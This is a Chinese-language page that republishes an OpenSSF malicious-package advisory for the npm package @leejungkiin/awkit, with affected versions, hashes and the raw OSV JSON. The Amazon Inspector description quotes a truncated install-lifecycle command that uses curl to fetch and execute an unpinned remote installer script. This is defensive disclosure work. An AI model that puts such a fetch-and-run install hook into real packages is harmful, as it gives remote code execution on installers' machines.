目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%
← 返回恶意软件包
npm active

@leejungkiin/awkit

MAL-2026-13427
2026-08-06 15:21:39
OpenSSF Malicious Packages
该软件包被识别为恶意包。建议隔离受影响环境,并排查凭据泄露和异常网络连接。

Summary

Malicious code in @leejungkiin/awkit (npm)

文件/数据外传
AI 分析整理qwen3.6
基于上游报告生成,请以下方原始证据为准。
公开使用量数据
统计周期
last-week
下载量
112
数据源
npmjs.org
下载量只代表仓库活动度,不等于已被入侵的安装数量。
受影响版本
EcosystemPackageVersion
npm@leejungkiin/awkit3.3.1
npm@leejungkiin/awkit3.3.2
npm@leejungkiin/awkit3.3.3
npm@leejungkiin/awkit3.3.4
npm@leejungkiin/awkit3.3.5
npm@leejungkiin/awkit3.3.8
npm@leejungkiin/awkit3.3.9
npm@leejungkiin/awkit3.4.0
npm@leejungkiin/awkit3.4.1
npm@leejungkiin/awkit3.4.2
npm@leejungkiin/awkit3.4.3
npm@leejungkiin/awkit3.4.4
npm@leejungkiin/awkit3.4.5
npm@leejungkiin/awkit3.4.6
npm@leejungkiin/awkit3.4.7
npm@leejungkiin/awkit3.4.8
npm@leejungkiin/awkit3.5.0
npm@leejungkiin/awkit3.5.10
npm@leejungkiin/awkit3.5.5
npm@leejungkiin/awkit3.5.6
npm@leejungkiin/awkit3.5.7
npm@leejungkiin/awkit3.5.8
npm@leejungkiin/awkit3.5.9
npm@leejungkiin/awkit3.6.0
npm@leejungkiin/awkit3.6.1
npm@leejungkiin/awkit3.6.2
恶意行为说明OpenSSF OSV
上游来源证据
展开原始 OSV JSON
{"modified":"2026-08-06T15:21:39Z","published":"2026-08-06T14:22:52Z","schema_version":"1.7.4","id":"MAL-2026-13427","summary":"Malicious code in @leejungkiin/awkit (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (0aa6db17591fc0a27924ca615763ffd2a3eb92d0f517de9719ce74ef47ac4add)\nThe package ships scripts/dependency-manager.js which, when run as part of the install lifecycle, invokes execSync('curl -fsSL https://raw.githubusercontent.com/rtk-ai/rtk/refs/heads/master/install.sh...') to fetch and execute an installer script from the rtk-ai/rtk repository on a mutable master branch. The fetched shell script is not pinned to a commit or hash and is controlled by a third-party GitHub account whose relationship to the @leejungkiin scope is not established. The same script also contacts https://www.rtk-ai.app and reads platform/home-directory information (os.homedir(), process.platform) during its operation. Because npm executes lifecycle scripts on install, this results in remote code execution from an unpinned, third-party-controlled source on the installer's machine, and the fetched code has full shell privileges to modify the environment, install further binaries, or exfiltrate host data. Additional bundled code (bin/awk.js, scripts/model-manager.js) combines child_process usage with hardcoded HTTP POST/fetch endpoints in a minified bundle.\n","affected":[{"package":{"ecosystem":"npm","name":"@leejungkiin/awkit"},"versions":["3.6.1","3.3.9","3.5.10","3.4.4","3.6.2","3.3.3","3.5.5","3.5.0","3.5.7","3.4.7","3.4.6","3.5.6","3.4.1","3.4.2","3.5.9","3.3.8","3.3.1","3.3.4","3.3.2","3.4.3","3.3.5","3.4.5","3.6.0","3.4.8","3.5.8","3.4.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"evidence_files":[{"path":"bin/awk.js","sha256":"791a73db5c7743fc3e3b1db4d6ee98f52f00ebd3f5cd72beabce58eec5a0bab6","tlsh":"5694a56a05fb11257a77e16d9b8f00226529f1873608dd247aacf3447fce168c6b27f8"},{"path":"docs/research/reverse-skills-study/credittone-android-re/android-reverse-engineering/skills/android-reverse-engineering/scripts/install-dep.sh","sha256":"af3058cb000b9b794e336c1de9d48c395969f41d801f631d3e0fce450460ff16","tlsh":"e852875b61b191b13e2843e56e8751a15391103f0cac7851b5ff7b08bb27b6ca1b372b"},{"path":"scripts/dependency-manager.js","sha256":"9c4e6dde57fad3106fee93fee440f1ed7fff6079c66389ce328d74e60d14b1ad","tlsh":"dae174ef06eb523459736669c70f8136661bd2031b4cdeb8b9df02056f4262882f7bd9"},{"path":"scripts/model-manager.js","sha256":"a006eb22aaa303eff9bdf6613e45a1cdeec4e9ed2f718428af8dc34ab50ecfbc","tlsh":"ede2854916f726264cb765a9db4f4025b419d4c33609ce647face3403f8a168dab2bec"},{"path":"symphony/multica-ref/apps/desktop/src/main/daemon-manager.ts","sha256":"dde58b4776642d9b5287a8600dc4067ac1492123fce7524e715e57b1b9ffdadf","tlsh":"d6d2f90731bd22764eb33569a25f6062271482133719d9e4f6dd97042f8b06ed1f2fea"},{"path":"symphony/multica-ref/scripts/ensure-postgres.sh","sha256":"35e11202d0d213d9109f5302c7a2e9fe28c14987dc9669c1fa9b520f36936635","tlsh":"f9514100f584ca700d9cd2d23842945ae569008f99492e2db3efbac43bbc755f43e61a"}],"package_integrity":[{"filename":"awkit-3.6.1.tgz","hashes":{"sha1":"1e70a6533c9e5613ee7bce2489f708017a0f92b2","sha512_sri":"sha512-Ark/pQF6uwIYSS+4TdNW8J5V42AFA1YWGouWsUupcp7Gby1l6alTtNToEgLToK48fb4Uownh7OfAs7zXgdCdJA=="}}]}}}],"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.6.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.10"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.6.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.3.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.6.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.5.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@leejungkiin/awkit/v/3.4.0"}],"credits":[{"name":"Amazon Inspector","type":"FINDER","contact":["inspector-research@amazon.com"]}],"database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-016622","import_time":"2026-08-06T15:19:33.615576359Z","modified_time":"2026-08-06T14:23:01Z","sha256":"0a1a925a4b666d348aed293111236b77719aa29e1d5d130a17cf6d73ceda734e","source":"amazon-inspector","versions":["3.6.1"]},{"id":"IN-MAL-2026-016639","import_time":"2026-08-06T15:19:34.50635312Z","modified_time":"2026-08-06T14:25:30Z","sha256":"42faaa7f4f9cb95f0d65f6f40859cf76c2e8a1e154fdce9293b60599f26e038e","source":"amazon-inspector","versions":["3.3.9"]},{"id":"IN-MAL-2026-016630","import_time":"2026-08-06T15:19:33.987738609Z","modified_time":"2026-08-06T14:24:08Z","sha256":"d4a5d67590bc44ac283475db8af4539baac581fb913d0d28bfa3aeeb7f3168ea","source":"amazon-inspector","versions":["3.5.10"]},{"id":"IN-MAL-2026-016633","import_time":"2026-08-06T15:19:34.178542556Z","modified_time":"2026-08-06T14:24:34Z","sha256":"0aa6db17591fc0a27924ca615763ffd2a3eb92d0f517de9719ce74ef47ac4add","source":"amazon-inspector","versions":["3.4.4"]},{"id":"IN-MAL-2026-016621","import_time":"2026-08-06T15:19:33.574307197Z","modified_time":"2026-08-06T14:22:52Z","sha256":"3e499c5c0eabd3d65b9dda518fbb66f4c21b84df9197103ad4fcdc4f227354af","source":"amazon-inspector","versions":["3.6.2"]},{"id":"IN-MAL-2026-016645","import_time":"2026-08-06T15:19:34.917798465Z","modified_time":"2026-08-06T14:26:26Z","sha256":"a577737407f35d7b4fbf0431aff54120225be0f9c15e9663f0630024b5b51946","source":"amazon-inspector","versions":["3.3.3"]},{"id":"IN-MAL-2026-016626","import_time":"2026-08-06T15:19:33.771727964Z","modified_time":"2026-08-06T14:23:36Z","sha256":"d373c1a3b3d4e7d84a6e7dc2133890b6675426abc73486e61ebf833169f4e43b","source":"amazon-inspector","versions":["3.5.5"]},{"id":"IN-MAL-2026-016629","import_time":"2026-08-06T15:19:33.945676361Z","modified_time":"2026-08-06T14:23:59Z","sha256":"f83f447a2daea941d56335e320da7042b6317d576a94bd3fdc1ed864330fd813","source":"amazon-inspector","versions":["3.5.0"]},{"id":"IN-MAL-2026-016625","import_time":"2026-08-06T15:19:33.725778066Z","modified_time":"2026-08-06T14:23:26Z","sha256":"1065add408e0c6b547f781d3eabea2bbc4dd24b4576bd484b8e3c16d884720ac","source":"amazon-inspector","versions":["3.5.7"]},{"id":"IN-MAL-2026-016632","import_time":"2026-08-06T15:19:34.133511993Z","modified_time":"2026-08-06T14:24:27Z","sha256":"11d2a8af770eb13adf7579dc2c3c509f41455bc3324b1f7dac68c25c4e87ba4f","source":"amazon-inspector","versions":["3.4.7"]},{"id":"IN-MAL-2026-016635","import_time":"2026-08-06T15:19:34.273795423Z","modified_time":"2026-08-06T14:24:51Z","sha256":"2fa77026374f0027fc9c2f41c9f6bbafeb51a0570d7a4a2e92b7607c13c75271","source":"amazon-inspector","versions":["3.4.6"]},{"id":"IN-MAL-2026-016627","import_time":"2026-08-06T15:19:33.82290202Z","modified_time":"2026-08-06T14:23:42Z","sha256":"329106cb85649866ee343f65c84c1a9d28c00566adbc1052bfcf960e8319a974","source":"amazon-inspector","versions":["3.5.6"]},{"id":"IN-MAL-2026-016637","import_time":"2026-08-06T15:19:34.38863958Z","modified_time":"2026-08-06T14:25:14Z","sha256":"5e4a132a5cc06766fa18facfd5508d390efcf6edf4b65dcd5b8dc8cef36c738e","source":"amazon-inspector","versions":["3.4.1"]},{"id":"IN-MAL-2026-016640","import_time":"2026-08-06T15:19:34.550265795Z","modified_time":"2026-08-06T14:25:38Z","sha256":"7f30a0974e6cecbaec4965af63bf40a1b0421ec8b98a84d2496be7c0c5593760","source":"amazon-inspector","versions":["3.4.2"]},{"id":"IN-MAL-2026-016623","import_time":"2026-08-06T15:19:33.649788607Z","modified_time":"2026-08-06T14:23:10Z","sha256":"bf076f6ea09cee0d5ecad5e8891824de19f4e8a7225aca2c93d2037fe493862d","source":"amazon-inspector","versions":["3.5.9"]},{"id":"IN-MAL-2026-016641","import_time":"2026-08-06T15:19:34.629049611Z","modified_time":"2026-08-06T14:25:46Z","sha256":"c60d57329c21d332faeba9050acdd8525edf4f1fe63f89ace8fa1dcc70aad93c","source":"amazon-inspector","versions":["3.3.8"]},{"id":"IN-MAL-2026-016646","import_time":"2026-08-06T15:19:34.982898408Z","modified_time":"2026-08-06T14:26:35Z","sha256":"25a2ff97af8a46fa8229c044e827e21acf3b083a4693b8841c64f7ca997d9ab0","source":"amazon-inspector","versions":["3.3.1"]},{"id":"IN-MAL-2026-016643","import_time":"2026-08-06T15:19:34.782506727Z","modified_time":"2026-08-06T14:26:09Z","sha256":"397f7af10dc34a1ee6275ceab224d4d7a6b2c25b682818afbd3d64765e549386","source":"amazon-inspector","versions":["3.3.4"]},{"id":"IN-MAL-2026-016644","import_time":"2026-08-06T15:19:34.837640494Z","modified_time":"2026-08-06T14:26:18Z","sha256":"4f69382e3c75aa4bc66ce9efadd3661e5af7cfde7f761717a26b8e74d8486e60","source":"amazon-inspector","versions":["3.3.2"]},{"id":"IN-MAL-2026-016636","import_time":"2026-08-06T15:19:34.326291401Z","modified_time":"2026-08-06T14:25:03Z","sha256":"6d9d978dc352805ffde329c488834a32666b90c0c6309ee2c511ef11a88aa947","source":"amazon-inspector","versions":["3.4.3"]},{"id":"IN-MAL-2026-016642","import_time":"2026-08-06T15:19:34.671953018Z","modified_time":"2026-08-06T14:25:54Z","sha256":"70f62693f5cf05acfaac84926f4fdcfed7e9148eaba2498ead0aa706525b004b","source":"amazon-inspector","versions":["3.3.5"]},{"id":"IN-MAL-2026-016634","import_time":"2026-08-06T15:19:34.221955359Z","modified_time":"2026-08-06T14:24:43Z","sha256":"ca64abd89bb7bc014c7fbfdc98d5bafaa0addc058539c385c1dad6aafa30ca4f","source":"amazon-inspector","versions":["3.4.5"]},{"id":"IN-MAL-2026-016628","import_time":"2026-08-06T15:19:33.871393229Z","modified_time":"2026-08-06T14:23:51Z","sha256":"d6aa7c559a7ed6d9555d51f4e632cd0cd0d7871e8562c00c3b766a8e00136f22","source":"amazon-inspector","versions":["3.6.0"]},{"id":"IN-MAL-2026-016631","import_time":"2026-08-06T15:19:34.076246887Z","modified_time":"2026-08-06T14:24:19Z","sha256":"6635437701cd2765e1d97623636c4906b144d75442904b5afd1e6983a52d9a18","source":"amazon-inspector","versions":["3.4.8"]},{"id":"IN-MAL-2026-016624","import_time":"2026-08-06T15:19:33.684465079Z","modified_time":"2026-08-06T14:23:18Z","sha256":"30c74792557ba4501f04cbd010be3d25002c8ca55234c57bd75f7f93f7ed5618","source":"amazon-inspector","versions":["3.5.8"]},{"id":"IN-MAL-2026-016638","import_time":"2026-08-06T15:19:34.447716435Z","modified_time":"2026-08-06T14:25:23Z","sha256":"3a2caadd8c859f96014136ec3c01d7b6b8016ff218f157651f5f40f2a3e5227c","source":"amazon-inspector","versions":["3.4.0"]}]}}

数据来源:OpenSSF Malicious Packages · Apache-2.0